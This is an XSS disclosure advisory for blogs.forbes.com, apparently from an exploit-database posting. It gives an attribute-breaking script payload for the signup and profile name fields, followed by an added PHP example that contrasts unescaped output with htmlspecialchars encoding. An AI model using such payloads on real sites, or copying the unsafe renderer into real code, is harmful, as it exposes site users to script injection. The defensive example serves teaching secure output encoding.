The blogs.forbes.com site suffers from a cross-site scripting vulnerability.
TITLE: FORBES Cross Site Scripting
vendor: FORBES
Author: r007k17-w
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: 2011 Forbes.com LLC
-------------------------------------------------------------------------------------------------------------------------------------------
DEMO:
1. http://blogs.forbes.com/wp-signup.php
In 'username' field POSTDATA="><script>alert(document.domain)</script>
2. http://blogs.forbes.com/wp-admin/user/profile.php
After signup, in 'Profile settings',
the 'First name', 'Last name' and 'Nickname' fields are vulnerable to XSS
POSTDATA: "><script>alert(document.domain)</script>
---------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts, L0rd CrUs4d3r, 3ps1lonl4mbd4, A1-w1n6( N17|< ), 1nJ3ct0r t3am and all my friends
------------------------------------------------------------------------------------------------------------
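Added example (not part of the original advisory, and not code from blogs.forbes.com or WordPress): why a value beginning with "> escapes an HTML attribute when a form echoes it back unencoded, and how encoding at output time keeps it inert. The renderer functions, the field names and the username policy are hypothetical; the sample value is the one from the DEMO section; PHP's DOM extension is assumed to be available. In WordPress code, esc_attr() is the usual helper for this output context.

```php
<?php
// Hypothetical renderers for a profile/signup form field (illustration only).

// Vulnerable pattern: the stored or submitted value goes into the attribute as-is,
// so a leading "> closes value="..." and the rest is parsed as markup.
function render_input_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML attribute context when writing output.
function render_input_safe(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<input type="text" name="' . htmlspecialchars($name, $flags, 'UTF-8')
         . '" value="' . htmlspecialchars($value, $flags, 'UTF-8') . '">';
}

// Regression check: parse the rendered HTML and count <script> elements.
function count_script_elements(string $html): int
{
    libxml_use_internal_errors(true);   // keep parser warnings out of the output
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length;
}

// Input-side allow-list for the signup username (assumed policy, defence in depth;
// it does not replace output encoding for free-text fields such as names).
function is_valid_username(string $u): bool
{
    return preg_match('/\A[a-z0-9]{4,60}\z/', $u) === 1;
}

// Value from the DEMO section; field names below are hypothetical.
$submitted = '"><script>alert(document.domain)</script>';

foreach (['user_name', 'first_name', 'last_name', 'nickname'] as $field) {
    $unsafe = render_input_unsafe($field, $submitted);
    $safe   = render_input_safe($field, $submitted);
    printf("%-10s unsafe: %d script element(s), safe: %d\n",
        $field, count_script_elements($unsafe), count_script_elements($safe));
    echo "           safe markup: ", $safe, PHP_EOL;
}

echo "username check: ", is_valid_username($submitted) ? 'accepted' : 'rejected', PHP_EOL;
```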